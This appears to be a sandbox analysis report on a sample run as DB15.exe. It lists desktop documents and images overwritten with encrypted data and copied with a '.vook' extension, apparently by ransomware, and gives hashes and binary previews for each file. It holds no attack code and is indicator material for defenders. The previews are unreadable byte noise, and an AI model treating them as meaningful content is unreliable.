                                                                                                                                                                                                                                      Preview:EOWRV..N.....J>.=......G...D..i..!...x.vo...Bk.D.....';D.Q........].O..P.b2.B.!.N...z.....+..(ds........|..OZ.b....<P..P......j9.}.h..t{..a.X8t.x..0.-O>.0..g^...( ......n...ro`.3.k.S..D. ?...]..0..^|N..Y\.|.............Z.8....J...D.|..qNe.{.L?.t........Q...VW.d......T..\^.....#.JR0%N2.Lb...a.0..F..e.'."..@Y8#.....Q.f0k../.....!(..$..A..3......!...G,=.....+.p.O.k....@.3.7wp....\..j....7O.$0<.....K.Ub..Z......y$.C....c.V7....\zT.....S....LY.I#ar...o........iY......NK......y.Be..%....p.2s.....=.w.G......QHp.d......kG.Q.k...z...N.q.6.|r.ow..zl".;hN.PQ.y.c'..._..`9.E..X.S.w..x[..H.O...r9.)*.].L$......y...2..............V.w.7...Z+pf..La..w.O..V....Z...a..,....n....-...V.....(.PLBZ.8v...%F'..h.~..;O._.N.....0G|../__...ih9.Vd-.{ ........u...nf..yI;.^Y.)$.!..0...sT.8R&..U.q.2H.3wO.k.E...pt..Rb.a.'..G ...@0:.k...v..l.I./}..........P.yST..k........@?..3..W."A,..\.......G!.\C..+.R.~u.S....e.....0...B..4.QqK.h...].ZT|...t%Xi*......._.........

                                                                                                                                                                                                                                      C:\Users\user\Desktop\GAOBCVIQIJ.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849947632346111
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eXATd9UPWAURNoT2jylIRhvqACgxBsNegAd7AdkHfv0PdsEXWSfqvLXS1iTkbD:UATLU+AlVlakgSS5bHfcPdsvLTiD
                                                                                                                                                                                                                                      MD5:896BCD484FAD5771AFC681FCB1CEB406
                                                                                                                                                                                                                                      SHA1:0B09ECED6D904401F02533582FAB811F5756A65F
                                                                                                                                                                                                                                      SHA-256:5169F107C534A79457A37382677E7E2663FD15D2A401B5AD6BBFCAB9F429B03A
                                                                                                                                                                                                                                      SHA-512:F4C8ACBD93B48182013C73080C0FEB014BE0AB29B7FB0A980ECAF75850AF81133F4212603DCFCF2263B3829A76F0919DD8CBFEF40A2F647F2EAD1910DF5A0207
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBCy.D/of.....F..."..$q.b_.;F...<A..J.l;,...Yc.(.z.I..e.8]...S...{.......|.....j.%V.I.1..w..r3...I.uu...i.4.3.c..........K7%].4.).B..?...Y....W..\...mI....Y..!:...w.p'.....(..y..p.0.^i.=`.9....\Y.#uU.k:..T.@....b......z.7.....L.<..+w.y/......v.$.K...*....[.....Mzp........6..)".|.F7..Xn...;+ft.#.R9. P.gf-f......F.........G@ ...f..._W.f8...R*T".+&.X6...A.Ys.{~h.. .>...L+..0.,V?..Z.O..S.cu.-...Y.VJQ.|..eDZ3.|.JxV.7..z~...oV.?...XK.......y.q..;.T.D/n.7...d.0........;.Rj...n..!ems9.g.....a........o..#$.$Y.].....q...].Y0 .....q.F...n....y&.........d..7*...W|...k.;.k..&.}`!..>.i{..F.F..;W.h!...8.I.$^.....c7....y.L{.K.P,.z.>.|.9[.X..B..P.n.D..\.D..X.Q.<.c}.D..#.|~..~4..*.u7... .NO.=.z.."....s+.0.p....C&.xb...f...U.'.........6..mK.|...".Fb..o_.1..XL9.h.v.<.NI.G.@....L.<.2.z>.?.G.5d.Ie.CY..l....Q.....@>.\.\. h;Av(...y.6...\J..Y....Y/.......X.U...X.l.......~P2.....x..)D.WP.s..N.. ...~*....M..K..G<]a..|.....q`.m.l.iWx4...... .....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\GAOBCVIQIJ.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.849947632346111
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eXATd9UPWAURNoT2jylIRhvqACgxBsNegAd7AdkHfv0PdsEXWSfqvLXS1iTkbD:UATLU+AlVlakgSS5bHfcPdsvLTiD
                                                                                                                                                                                                                                      MD5:896BCD484FAD5771AFC681FCB1CEB406
                                                                                                                                                                                                                                      SHA1:0B09ECED6D904401F02533582FAB811F5756A65F
                                                                                                                                                                                                                                      SHA-256:5169F107C534A79457A37382677E7E2663FD15D2A401B5AD6BBFCAB9F429B03A
                                                                                                                                                                                                                                      SHA-512:F4C8ACBD93B48182013C73080C0FEB014BE0AB29B7FB0A980ECAF75850AF81133F4212603DCFCF2263B3829A76F0919DD8CBFEF40A2F647F2EAD1910DF5A0207
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBCy.D/of.....F..."..$q.b_.;F...<A..J.l;,...Yc.(.z.I..e.8]...S...{.......|.....j.%V.I.1..w..r3...I.uu...i.4.3.c..........K7%].4.).B..?...Y....W..\...mI....Y..!:...w.p'.....(..y..p.0.^i.=`.9....\Y.#uU.k:..T.@....b......z.7.....L.<..+w.y/......v.$.K...*....[.....Mzp........6..)".|.F7..Xn...;+ft.#.R9. P.gf-f......F.........G@ ...f..._W.f8...R*T".+&.X6...A.Ys.{~h.. .>...L+..0.,V?..Z.O..S.cu.-...Y.VJQ.|..eDZ3.|.JxV.7..z~...oV.?...XK.......y.q..;.T.D/n.7...d.0........;.Rj...n..!ems9.g.....a........o..#$.$Y.].....q...].Y0 .....q.F...n....y&.........d..7*...W|...k.;.k..&.}`!..>.i{..F.F..;W.h!...8.I.$^.....c7....y.L{.K.P,.z.>.|.9[.X..B..P.n.D..\.D..X.Q.<.c}.D..#.|~..~4..*.u7... .NO.=.z.."....s+.0.p....C&.xb...f...U.'.........6..mK.|...".Fb..o_.1..XL9.h.v.<.NI.G.@....L.<.2.z>.?.G.5d.Ie.CY..l....Q.....@>.\.\. h;Av(...y.6...\J..Y....Y/.......X.U...X.l.......~P2.....x..)D.WP.s..N.. ...~*....M..K..G<]a..|.....q`.m.l.iWx4...... .....

                                                                                                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857406875753311
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:/22vcMBGQUusXiO5EhVD8xCstz0J5NXlnIbmVgzSQIyKiOA/riTkbD:+ZMB3UusXtqVD8dsXIugzSQrC/iD
                                                                                                                                                                                                                                      MD5:CAD39E0178249DCA4681C4F99A715AA0
                                                                                                                                                                                                                                      SHA1:376B581BE84760CB03C31FA56667F3A612956DC3
                                                                                                                                                                                                                                      SHA-256:2B95300F035370C0919A575F4F8DE7BA23D3D24C7B56B0A621B83BFB2D9B208A
                                                                                                                                                                                                                                      SHA-512:740078C7C294B5EF51031F842196FB037C90C7D842009ABB40264E8DC63D92341F2919C24043A860ED05DA245DA10DE42BABD7A46D3DBF1F6DCC4E152B4E917C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZDq3._D...Dr.W.-..%:...e.[....S...{.""..8V.`...V. .[.v..r(=pQ..x..T.d...*.L...F.......U`.......K.d..$.v......S..m.....)]....S[b(y..g.2,...w..*.rV.....,.....v.."./........<k..O.~V....[..LQ.rn.....^..C...5..g7>^._R.8.9.<....v...A.Jzv.......J.g.X.!.l.J..S..C...l.7.h....u.CR,..~V..T.L.,.].$.$.Oa...^..e..$V......(.o.....TF...X~...t.C..KP.;..t.f%..V=;.gP._.;O.....u.'..;L..)./e.'..HB:..oy..=6.......F....>...5.M....1..&..8..s;.I$..Q.&...T...:.R.%....z.5r:...X.G.T\k.Y...!.e....k.WEg...;*/....y..6.]E...k.Y.f..2.u.9.9..A...2NJ..h..|...a.....k...J{..a..l.;.2.T..5....G.V....K.@....m.-.k.....0e..."A#.E4.rs.....9`v..;+l& Joe.K....c.>Q.d.D....q......pz.............8..,H7.4..........:.;.....l]Y......... OS9i8.+b...G.g..Q.9..u...t{7..qL...l-...`.I..]x.R..L..= %(...2..0...su.....%..Q.Q..g..h...<...R.C@...5.-...*..g".F-....w.._.../..t.........Cv...l...:.b..E....2_Q.y..8./j..f.Vm..R.H....m.uf.$...hSEY..1.....i!WaH)..&.nlc.....k4...<n.M.........H.V..C..j.....;.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\GRXZDKKVDB.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.857406875753311
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:/22vcMBGQUusXiO5EhVD8xCstz0J5NXlnIbmVgzSQIyKiOA/riTkbD:+ZMB3UusXtqVD8dsXIugzSQrC/iD
                                                                                                                                                                                                                                      MD5:CAD39E0178249DCA4681C4F99A715AA0
                                                                                                                                                                                                                                      SHA1:376B581BE84760CB03C31FA56667F3A612956DC3
                                                                                                                                                                                                                                      SHA-256:2B95300F035370C0919A575F4F8DE7BA23D3D24C7B56B0A621B83BFB2D9B208A
                                                                                                                                                                                                                                      SHA-512:740078C7C294B5EF51031F842196FB037C90C7D842009ABB40264E8DC63D92341F2919C24043A860ED05DA245DA10DE42BABD7A46D3DBF1F6DCC4E152B4E917C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GRXZDq3._D...Dr.W.-..%:...e.[....S...{.""..8V.`...V. .[.v..r(=pQ..x..T.d...*.L...F.......U`.......K.d..$.v......S..m.....)]....S[b(y..g.2,...w..*.rV.....,.....v.."./........<k..O.~V....[..LQ.rn.....^..C...5..g7>^._R.8.9.<....v...A.Jzv.......J.g.X.!.l.J..S..C...l.7.h....u.CR,..~V..T.L.,.].$.$.Oa...^..e..$V......(.o.....TF...X~...t.C..KP.;..t.f%..V=;.gP._.;O.....u.'..;L..)./e.'..HB:..oy..=6.......F....>...5.M....1..&..8..s;.I$..Q.&...T...:.R.%....z.5r:...X.G.T\k.Y...!.e....k.WEg...;*/....y..6.]E...k.Y.f..2.u.9.9..A...2NJ..h..|...a.....k...J{..a..l.;.2.T..5....G.V....K.@....m.-.k.....0e..."A#.E4.rs.....9`v..;+l& Joe.K....c.>Q.d.D....q......pz.............8..,H7.4..........:.;.....l]Y......... OS9i8.+b...G.g..Q.9..u...t{7..qL...l-...`.I..]x.R..L..= %(...2..0...su.....%..Q.Q..g..h...<...R.C@...5.-...*..g".F-....w.._.../..t.........Cv...l...:.b..E....2_Q.y..8./j..f.Vm..R.H....m.uf.$...hSEY..1.....i!WaH)..&.nlc.....k4...<n.M.........H.V..C..j.....;.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\IPKGELNTQY.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843055210409865
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:hBdqjSJHAR3mh1pjk3cpHHHUBS1FW6hg5bsAzBnTIhQ+Zr0xfRSOiyy5KyiTkbD:hBBiNmlRuQonshQ5Rq5MiD
                                                                                                                                                                                                                                      MD5:0A80658052ECFCDAD3B06B82DB1EA81F
                                                                                                                                                                                                                                      SHA1:4A0192FA2C4943F01CC789CB734CC2DE8CD9CC9F
                                                                                                                                                                                                                                      SHA-256:9D7B8824EB159DE362924A68875B738015C2E1BBC4D18ED672DA1A66633E4935
                                                                                                                                                                                                                                      SHA-512:26250F3550E73DBFC77E2B1828F9715BA2430F7CCB53255B0F8D50E89C7BCFC65010DC255EBFE79A88130D3F153B57C5687683E2B13E7119EBA20E86FFEC0D12
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE.]{...<.!O...L+y..'...5..'..}...b._.TIy...".eRX.H.b..H.ml../>.............|..~.|..d......7 El../%>.....X7.A..b.....X....3......R.).&n.-...Yn.j.c.1kJ..F...W..h^G.n.+.'.f...u.:..n.'4....l2.5......o.....9IL.....(B...PWo.*M2...B.[;..@^eaW..5.8J.!.Q.z,pe..dVu.OA...[|&<)..L.N.,...o....X{A.S...4.FC..E^...../\w.$..w....y.B...:.t.U. ^Kw...kg.5.k.....S.,.6.........|.<....Fy..I&....TZ.Yf.. <*....)./.Y...eK.....s0...q)*Q.e.Y{.T....>.R../..F.....~....8u#ETY..FT..0..*Fq..&......$..i..l......-9'.E..*.8........}.5....h. ...P.z.4.~.:./.....?.S/.O..XX......vU.C....(}...f>.q.[.AQ.s.<...e.K....a.A..k..j.@....Zm.R/^W.-.[t..Q...9.E.uT....1.iNpL......Q...8.....D.+..=.|...Ry..mEHU"~.H9....Z.op...,.t..][..:.B ....%a..$Lx.=.Ub%...\.i..3.{.8...qxx.6.Y..R..cE.?3.[Ma.*`...G.xo......ce)..h.;......h~..p...i..G..`..'....xp8.*M..mw.>.=0..-p.QW..gS.....:.6..#.\e.G.."%......[.e..h.}R.c.$:............[.Hq...z...=e..=.x...@P%.3.?q.2T.5...'l.)..C..~u....._o...)u....Q..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\IPKGELNTQY.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.843055210409865
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:hBdqjSJHAR3mh1pjk3cpHHHUBS1FW6hg5bsAzBnTIhQ+Zr0xfRSOiyy5KyiTkbD:hBBiNmlRuQonshQ5Rq5MiD
                                                                                                                                                                                                                                      MD5:0A80658052ECFCDAD3B06B82DB1EA81F
                                                                                                                                                                                                                                      SHA1:4A0192FA2C4943F01CC789CB734CC2DE8CD9CC9F
                                                                                                                                                                                                                                      SHA-256:9D7B8824EB159DE362924A68875B738015C2E1BBC4D18ED672DA1A66633E4935
                                                                                                                                                                                                                                      SHA-512:26250F3550E73DBFC77E2B1828F9715BA2430F7CCB53255B0F8D50E89C7BCFC65010DC255EBFE79A88130D3F153B57C5687683E2B13E7119EBA20E86FFEC0D12
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE.]{...<.!O...L+y..'...5..'..}...b._.TIy...".eRX.H.b..H.ml../>.............|..~.|..d......7 El../%>.....X7.A..b.....X....3......R.).&n.-...Yn.j.c.1kJ..F...W..h^G.n.+.'.f...u.:..n.'4....l2.5......o.....9IL.....(B...PWo.*M2...B.[;..@^eaW..5.8J.!.Q.z,pe..dVu.OA...[|&<)..L.N.,...o....X{A.S...4.FC..E^...../\w.$..w....y.B...:.t.U. ^Kw...kg.5.k.....S.,.6.........|.<....Fy..I&....TZ.Yf.. <*....)./.Y...eK.....s0...q)*Q.e.Y{.T....>.R../..F.....~....8u#ETY..FT..0..*Fq..&......$..i..l......-9'.E..*.8........}.5....h. ...P.z.4.~.:./.....?.S/.O..XX......vU.C....(}...f>.q.[.AQ.s.<...e.K....a.A..k..j.@....Zm.R/^W.-.[t..Q...9.E.uT....1.iNpL......Q...8.....D.+..=.|...Ry..mEHU"~.H9....Z.op...,.t..][..:.B ....%a..$Lx.=.Ub%...\.i..3.{.8...qxx.6.Y..R..cE.?3.[Ma.*`...G.xo......ce)..h.;......h~..p...i..G..`..'....xp8.*M..mw.>.=0..-p.QW..gS.....:.6..#.\e.G.."%......[.e..h.}R.c.$:............[.Hq...z...=e..=.x...@P%.3.?q.2T.5...'l.)..C..~u....._o...)u....Q..

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821647505088281
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O1YHm5Wtilqq5Yu5XreY6LBQdJCfFgsI1KHNYieMDNOFsbNWi6iPPWNWiTkbD:5HAWMlmsKYMyJOeseyFeuHNZPPeNTiD
                                                                                                                                                                                                                                      MD5:9593A670FDF7F12C68B3253C7D57AD98
                                                                                                                                                                                                                                      SHA1:4B139236F91AFB9790271A1AD41576A59CB46D96
                                                                                                                                                                                                                                      SHA-256:0C333CD90337A5E8FD08712197EF0348DEC0B7DE9CD01DCEE59DE74FB226E723
                                                                                                                                                                                                                                      SHA-512:A5AD985E4F586D6F7E646C372B6C52BF44FB042C2F44162722448BA0EB3B72CD3AD45B6112806158D8F52B2ED7BAAF06AF374E06CF3F4AD32D235F2A2B0CF9BA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Preview:MXPXC.+%..z.k.;......n..~......X......+.BJ.".....F.4...Q.v.N..PI..j...5!a+..VH....z....9...|.M.Z..Hk.....=...o.(os9>E..F.,..M:......ge)}.7.q...._-^_\......V..t\{P.1..q.F.Q._]Lz.$..|..B?;.w.:".......+L.....~#...ai..(/f.B~......)p.V...N......t..M0TE.7._9..9..cmn.p..b...6..qSPq.....]....izH.x...P*....U_h....6..c.%].7;4N..!...h..V...2..}W6...G.....C.D,.l0....4{....Vx[.G.JF.?s t_..g'u....{.B.24(.6...K.i.....j.....K..F...U...e<.FI_..+ec...2.I.c..A._...W.....<..k..e.+...Ha.......L^..<.../...Z....H?....(....8%UB4...G_.1Ix.p....:..H...5...:.A=..|./..#.......=6.....P.....l.....U../W.y..m.?.:.y.f..h.\n.A#q.LB.|k....-.Z.NjSz.m2....T.@F..b..z.d..g.x.....-.........4mZ;<..sqC.....%...(....^JH.+....I..T{1)).....c...mK..5z....q0..c...._...}r%...f.Y..5uTx.gM..^.k5..:...,.if...>..T..6.=.49YA...V.^...S..U.M..e6;.....S.z....-.qf.W...&......@[.o[6...0..d..s.......W.w9).^R,g...`...*.........-..^.Y..8..E7.....j8.)Il...)..h}A.T..AGB...,....q.z\a..j.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.821647505088281
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O1YHm5Wtilqq5Yu5XreY6LBQdJCfFgsI1KHNYieMDNOFsbNWi6iPPWNWiTkbD:5HAWMlmsKYMyJOeseyFeuHNZPPeNTiD
                                                                                                                                                                                                                                      MD5:9593A670FDF7F12C68B3253C7D57AD98
                                                                                                                                                                                                                                      SHA1:4B139236F91AFB9790271A1AD41576A59CB46D96
                                                                                                                                                                                                                                      SHA-256:0C333CD90337A5E8FD08712197EF0348DEC0B7DE9CD01DCEE59DE74FB226E723
                                                                                                                                                                                                                                      SHA-512:A5AD985E4F586D6F7E646C372B6C52BF44FB042C2F44162722448BA0EB3B72CD3AD45B6112806158D8F52B2ED7BAAF06AF374E06CF3F4AD32D235F2A2B0CF9BA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC.+%..z.k.;......n..~......X......+.BJ.".....F.4...Q.v.N..PI..j...5!a+..VH....z....9...|.M.Z..Hk.....=...o.(os9>E..F.,..M:......ge)}.7.q...._-^_\......V..t\{P.1..q.F.Q._]Lz.$..|..B?;.w.:".......+L.....~#...ai..(/f.B~......)p.V...N......t..M0TE.7._9..9..cmn.p..b...6..qSPq.....]....izH.x...P*....U_h....6..c.%].7;4N..!...h..V...2..}W6...G.....C.D,.l0....4{....Vx[.G.JF.?s t_..g'u....{.B.24(.6...K.i.....j.....K..F...U...e<.FI_..+ec...2.I.c..A._...W.....<..k..e.+...Ha.......L^..<.../...Z....H?....(....8%UB4...G_.1Ix.p....:..H...5...:.A=..|./..#.......=6.....P.....l.....U../W.y..m.?.:.y.f..h.\n.A#q.LB.|k....-.Z.NjSz.m2....T.@F..b..z.d..g.x.....-.........4mZ;<..sqC.....%...(....^JH.+....I..T{1)).....c...mK..5z....q0..c...._...}r%...f.Y..5uTx.gM..^.k5..:...,.if...>..T..6.=.49YA...V.^...S..U.M..e6;.....S.z....-.qf.W...&......@[.o[6...0..d..s.......W.w9).^R,g...`...*.........-..^.Y..8..E7.....j8.)Il...)..h}A.T..AGB...,....q.z\a..j.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831149575799355
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mH0PQaZzvkEc1vyKFvJg/4EIqy+mEcbOQb5u+ihxQvOJi8tiTkbD:mPaZzaNvJg/LyrEcbO8ulxQ0i8kiD
                                                                                                                                                                                                                                      MD5:8A06FB472509ADDB03F747D4D796BAF1
                                                                                                                                                                                                                                      SHA1:1E0B465B53BA17AC426AC5D3651F746773576677
                                                                                                                                                                                                                                      SHA-256:AA2A2C7292FC9538F021BAC8B542F5206B2D750E9040F5F99843CB626632CF80
                                                                                                                                                                                                                                      SHA-512:D23BFAED0909B6EF12B7777DF8D34F58779C622FDA483214860284C195E42872D9DF5E77F99A1188BC9CFA6F180F5B5F863BD0CE61467A9057BCD985D8113B2A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXCd....Xbr..Y.....T...w..1_.,..&.#D .<WO9.+|f...O....z...%...k.J.k%f.k...R....6......b.....w...K.R{.+.6...W.........[.z.r....[b$.Z.`....h.._...W.P.E0.f..?.w.`..&(.!..6....a....\PJlz..|..6{....5vj.a..F...+....\.P\.......,ej..IZp.>...)~........<l.l_x.3...<..Q.x..J...G_.k...g.....r/...&.......tG..k...vIl:.R.-'...Wx.O.y...)6.x..u~@l$.S..U..@...\8.d..w......m<....+3|Xr..X.......0X./.US..b..t..Z.........O...6..5...V.. ..Ont[...U..v.P..X.Q>.7..@.O.\..K.1.E.lQ..=...../y...g..+./....x....S....~.+P*d@ern#..;..4..mt.H9..g..[...Y......U...P%....-/.h.K.H....I.F.........?.%.0H.P......7Q=.C.$}...0p.....D`.\{h.2'."..U.....QxGJ.i.~.;...@.-W.dJ Q...#.}..Ud...N.F...._6.L..Q..gD="\....o..){....G..Y.z..K.....b..h.........L....(.1BJzwzat..f....?.L&}N.N......bxv.n5.Jd2..m@.~<.L.s.DV1...m.<. .DL(x2........h....`....$=.u.}.0jx.d.b..7P1.S.{t.7.@."..7..-=..g6.+.#S..9-....EU...K.;yI.Nu...\l.Z/.....c..fw...-...9..7."..#.f.)..V...........a.?.r.......v...a......~

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.831149575799355
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:mH0PQaZzvkEc1vyKFvJg/4EIqy+mEcbOQb5u+ihxQvOJi8tiTkbD:mPaZzaNvJg/LyrEcbO8ulxQ0i8kiD
                                                                                                                                                                                                                                      MD5:8A06FB472509ADDB03F747D4D796BAF1
                                                                                                                                                                                                                                      SHA1:1E0B465B53BA17AC426AC5D3651F746773576677
                                                                                                                                                                                                                                      SHA-256:AA2A2C7292FC9538F021BAC8B542F5206B2D750E9040F5F99843CB626632CF80
                                                                                                                                                                                                                                      SHA-512:D23BFAED0909B6EF12B7777DF8D34F58779C622FDA483214860284C195E42872D9DF5E77F99A1188BC9CFA6F180F5B5F863BD0CE61467A9057BCD985D8113B2A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXCd....Xbr..Y.....T...w..1_.,..&.#D .<WO9.+|f...O....z...%...k.J.k%f.k...R....6......b.....w...K.R{.+.6...W.........[.z.r....[b$.Z.`....h.._...W.P.E0.f..?.w.`..&(.!..6....a....\PJlz..|..6{....5vj.a..F...+....\.P\.......,ej..IZp.>...)~........<l.l_x.3...<..Q.x..J...G_.k...g.....r/...&.......tG..k...vIl:.R.-'...Wx.O.y...)6.x..u~@l$.S..U..@...\8.d..w......m<....+3|Xr..X.......0X./.US..b..t..Z.........O...6..5...V.. ..Ont[...U..v.P..X.Q>.7..@.O.\..K.1.E.lQ..=...../y...g..+./....x....S....~.+P*d@ern#..;..4..mt.H9..g..[...Y......U...P%....-/.h.K.H....I.F.........?.%.0H.P......7Q=.C.$}...0p.....D`.\{h.2'."..U.....QxGJ.i.~.;...@.-W.dJ Q...#.}..Ud...N.F...._6.L..Q..gD="\....o..){....G..Y.z..K.....b..h.........L....(.1BJzwzat..f....?.L&}N.N......bxv.n5.Jd2..m@.~<.L.s.DV1...m.<. .DL(x2........h....`....$=.u.}.0jx.d.b..7P1.S.{t.7.@."..7..-=..g6.+.#S..9-....EU...K.;yI.Nu...\l.Z/.....c..fw...-...9..7."..#.f.)..V...........a.?.r.......v...a......~

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\BNAGMGSPLO.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.829875317530163
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:2XMSLLJAt1sMKKchruP1mS/q0FB/bb5bbDcL+UuOlNPFTb/6YsMabiTkbD:tSLM1s7KccRS0FVn5bbDcuUNR/WMaOiD
                                                                                                                                                                                                                                      MD5:3282F9299FD5090179510794CA34EEF9
                                                                                                                                                                                                                                      SHA1:715EBB6442001FBC28D2A978F6AC5DCD69BFD5C8
                                                                                                                                                                                                                                      SHA-256:F37DDFE2CE33FEB0056947191B709AC9CC546EB9FA63922A530F4E2F7C1592C1
                                                                                                                                                                                                                                      SHA-512:7FA1A03A28E428EAF35151EFC43FC6CDC1E24EB158A64643A90A71D772B7C38DA032DD6A302D60689A216F18904A0E649916C3AD82F2E4296C4B18418523B2C7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM.9.oGUY........Gg...HF/....e0.........1c<.m...`x-.0...R.s".]-..v..hh..~..kL.......[...{=..d.."o.yf.@J... .B....k.^3..8m.(.P.../..O.8.!..........XR........E...c....x7...I.........*..*..)0..........z..m.. .......0......-.=M..6...g.%`......n..9..)..>H....E.h..!..kV.....">h..zb...R..gg..KO!.....wD.E..^\.<dDI4...>....J.....aV4.^..!...-.{NH. 5.......C+........\t.".G./*.P../b....6\.6.2.mQ.....n:."cp..;Q_......b.o.'^.@......#4.?G.........H{.]#+z....o....%.,V.:........-e.[.J.H-......,c._ l....[.;.........1[.a.p...k1%^+.G~m.i..h....$..c.'@.WN...I6..ad5...G....^.pJ......S....Q.]..})......7.B%...D_.!u`..J"a3B..f.8.}K.pI..O....q.......Q..Q2.,0....*.Wc..)..fg%8_WT..!.)..C..x...[..K.-.&.....v..$...L9.xlM........1[.L....#.?..@-...Nv.+..Y.d.....A\mNG.l..jMS..(....Q(...dG...,B_..+..PtSx*U.....T.0.....f..A.'5.dB...)kG...6..xAE...{...K.Z...v;...m.=..M.;....-..%+F....:ir.....^.=q7.Mha..K.......wv.6.6..r.-..%..M.m...b....S ..:<y.;..4.H..=.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\MXPXCVPDVN\BNAGMGSPLO.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
